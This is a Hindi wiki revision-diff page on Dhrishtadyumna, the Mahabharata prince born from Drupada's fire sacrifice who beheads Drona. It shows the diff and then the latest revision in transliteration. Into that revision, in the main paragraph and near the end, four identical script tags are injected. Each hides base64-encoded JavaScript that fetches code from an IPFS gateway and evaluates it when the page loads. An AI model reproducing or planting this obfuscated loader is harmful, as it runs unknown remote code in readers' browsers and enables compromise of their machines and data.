Difference between revisions of "धृष्टद्युम्न"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "{{महाभारत2}}" to "")
 
(8 intermediate revisions by 4 users not shown)
Line 1: Line 1:
 
[[चित्र:Dronacharya.jpg|250px|thumb|[[महाभारत]] में द्रोणाचार्य का वध करते हुए धृष्टद्युम्न ]]
 
[[चित्र:Dronacharya.jpg|250px|thumb|[[महाभारत]] में द्रोणाचार्य का वध करते हुए धृष्टद्युम्न ]]
 
*महाराज [[द्रुपद]] ने [[द्रोणाचार्य]] से अपने अपमान का बदला लेने के लिये संतान-प्राप्ति के उद्देश्य से यज्ञ किया।  
 
*महाराज [[द्रुपद]] ने [[द्रोणाचार्य]] से अपने अपमान का बदला लेने के लिये संतान-प्राप्ति के उद्देश्य से यज्ञ किया।  
*यज्ञ की पूर्णाहुति के समय यज्ञकुण्ड से मुकुट, कुण्डल, कवच, त्रोण तथा धनुष धारण किये हुए एक कुमार प्रकट हुआ।  
+
*यज्ञ की पूर्णाहुति के समय यज्ञकुण्ड से मुकुट, [[कुण्डल]], कवच, त्रोण तथा धनुष धारण किये हुए एक कुमार प्रकट हुआ।  
 
*इस कुमार का नाम धृष्टद्युम्न रखा गया।  
 
*इस कुमार का नाम धृष्टद्युम्न रखा गया।  
 
*[[महाभारत]] के युद्ध में [[पाण्डव]]-पक्ष का यही कुमार सेनापति रहा।  
 
*[[महाभारत]] के युद्ध में [[पाण्डव]]-पक्ष का यही कुमार सेनापति रहा।  
Line 7: Line 7:
 
*इनके पुत्र का नाम धृष्टकेतु था। [[पाण्डव|पाण्डवों]] की ओर से [[महाभारत]] में युद्ध लड़े थे। इन्होंने [[द्रोणाचार्य|द्रोण]] का वध किया था  
 
*इनके पुत्र का नाम धृष्टकेतु था। [[पाण्डव|पाण्डवों]] की ओर से [[महाभारत]] में युद्ध लड़े थे। इन्होंने [[द्रोणाचार्य|द्रोण]] का वध किया था  
 
==महाभारत से==
 
==महाभारत से==
धृष्टद्युम्न [[पांचाल]]-राज [[द्रुपद]] का पुत्र था। [[महाभारत]]-युद्ध में उसने द्रुमसेन का वध किया था। [[द्रोण]] के हाथों द्रुपद अपने तीन पौत्रों तथा [[विराट]] सहित मारे गये। धृष्टद्युम्न क्रोध से थरथरा उठा और द्रोण को मारने के लिए उसने शपथ ली, किंतु द्रोण वीर योद्धाओं से इतने सुरक्षित थे कि वह उनका कुछ भी बिगाड़ न पाया। तभी [[भीम]] ने आकर उसे युद्ध के लिए उत्साहित किया तथा दोनों वीर द्रोण की सेना में घुस गये। श्री[[कृष्ण]] की प्रेरणा से [[पांडव|पांडवों]] ने द्रोण तक यह झूठा समाचार पहुंचाया कि [[अश्वत्थामा]] मारा गया है। फलस्वरूप द्रोण ने [[अस्त्र शस्त्र]] त्याग दिये। अवसर का लाभ उठाकर धृष्टद्युम्न ने द्रोण के बाल पकड़कर सिर काट डाला। वास्तव में द्रुपद ने एक वृहत यज्ञ में देवोपासना के उपरांत प्रज्वलित [[अग्निदेव|अग्नि]] से द्रोणाचार्य के वध के निमित्त ही धृष्टद्युम्न नामक राजकुमार को प्राप्त किया था तथा द्रोण ने धृष्टद्युम्न के वध के लिए अश्वत्थामा को जन्म दिया था। द्रोण-वध को लेकर [[अर्जुन]] तथा [[सात्यकि]] का धृष्टद्युम्न से बहुत विवाद हो गया। [[भीम]], [[सहदेव]], [[युधिष्ठिर]] तथा [[कृष्ण]] ने बीच-बचाव कराया<ref>महाभारत, द्रोणपर्व, अध्याय 166, श्लोक 1 से 22 तक, अ0 186, अ0 193</ref>।  
+
धृष्टद्युम्न [[पांचाल]]-राज [[द्रुपद]] का पुत्र था। [[महाभारत]]-युद्ध में उसने द्रुमसेन का वध किया था। [[द्रोण]] के हाथों द्रुपद अपने तीन पौत्रों तथा [[विराट]] सहित मारे गये। धृष्टद्युम्न क्रोध से थरथरा उठा और द्रोण को मारने के लिए उसने शपथ ली, किंतु द्रोण वीर योद्धाओं से इतने सुरक्षित थे कि वह उनका कुछ भी बिगाड़ न पाया। तभी [[भीम (पांडव)|भीम]] ने आकर उसे युद्ध के लिए उत्साहित किया तथा दोनों वीर द्रोण की सेना में घुस गये। श्री[[कृष्ण]] की प्रेरणा से [[पांडव|पांडवों]] ने द्रोण तक यह झूठा समाचार पहुंचाया कि [[अश्वत्थामा]] मारा गया है। फलस्वरूप द्रोण ने [[अस्त्र शस्त्र]] त्याग दिये। अवसर का लाभ उठाकर धृष्टद्युम्न ने द्रोण के बाल पकड़कर सिर काट डाला। वास्तव में द्रुपद ने एक वृहत यज्ञ में देवोपासना के उपरांत प्रज्वलित [[अग्निदेव|अग्नि]] से द्रोणाचार्य के वध के निमित्त ही धृष्टद्युम्न नामक राजकुमार को प्राप्त किया था तथा द्रोण ने धृष्टद्युम्न के वध के लिए अश्वत्थामा को जन्म दिया था। द्रोण-वध को लेकर [[अर्जुन]] तथा [[सात्यकि]] का धृष्टद्युम्न से बहुत विवाद हो गया। [[भीम (पांडव)|भीम]], [[सहदेव]], [[युधिष्ठिर]] तथा [[कृष्ण]] ने बीच-बचाव कराया<ref>महाभारत, द्रोणपर्व, अध्याय 166, श्लोक 1 से 22 तक, अ0 186, अ0 193</ref>।  
==टीका टिप्पणी==
+
{{प्रचार}}
 +
{{संदर्भ ग्रंथ}}
 +
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==अन्य लिंक==
+
==संबंधित लेख==
{{महाभारत}}
+
{{महाभारत}}{{पौराणिक चरित्र}}  
{{महाभारत2}}
+
[[Category:पौराणिक चरित्र]]
 
[[Category:पौराणिक कोश]]
 
[[Category:पौराणिक कोश]]
 
[[Category:महाभारत]]
 
[[Category:महाभारत]]
 
[[Category:प्रसिद्ध चरित्र और मिथक कोश]]
 
[[Category:प्रसिद्ध चरित्र और मिथक कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 07:53, 31 May 2016

[[chitr:Dronacharya.jpg|250px|thumb|mahabharat mean dronachary ka vadh karate hue dhrishtadyumn ]]

  • maharaj drupad ne dronachary se apane apaman ka badala lene ke liye santan-prapti ke uddeshy se yajn kiya.
  • yajn ki poornahuti ke samay yajnakund se mukut, kundal, kavach, tron tatha dhanush dharan kiye hue ek kumar prakat hua.
  • is kumar ka nam dhrishtadyumn rakha gaya.
  • mahabharat ke yuddh mean pandav-paksh ka yahi kumar senapati raha.
  • ye drupad ke putr tatha draupadi ke bhaee the, jo yajnakund se utpann hue the.
  • inake putr ka nam dhrishtaketu tha. pandavoan ki or se mahabharat mean yuddh l de the. inhoanne dron ka vadh kiya tha

mahabharat se

dhrishtadyumn paanchal-raj drupad ka putr tha. mahabharat-yuddh mean usane drumasen ka vadh kiya tha. dron ke hathoan drupad apane tin pautroan tatha virat sahit mare gaye. dhrishtadyumn krodh se tharathara utha aur dron ko marane ke lie usane shapath li, kiantu dron vir yoddhaoan se itane surakshit the ki vah unaka kuchh bhi biga d n paya. tabhi bhim ne akar use yuddh ke lie utsahit kiya tatha donoan vir dron ki sena mean ghus gaye. shrikrishna ki prerana se paandavoan ne dron tak yah jhootha samachar pahuanchaya ki ashvatthama mara gaya hai. phalasvaroop dron ne astr shastr tyag diye. avasar ka labh uthakar dhrishtadyumn ne dron ke bal pak dakar sir kat dala. vastav mean drupad ne ek vrihat yajn mean devopasana ke uparaant prajvalit agni se dronachary ke vadh ke nimitt hi dhrishtadyumn namak rajakumar ko prapt kiya tha tatha dron ne dhrishtadyumn ke vadh ke lie ashvatthama ko janm diya tha. dron-vadh ko lekar arjun tatha satyaki ka dhrishtadyumn se bahut vivad ho gaya. bhim, sahadev, yudhishthir tatha krishna ne bich-bachav karaya[1]. <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. mahabharat, dronaparv, adhyay 166, shlok 1 se 22 tak, a0 186, a0 193

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>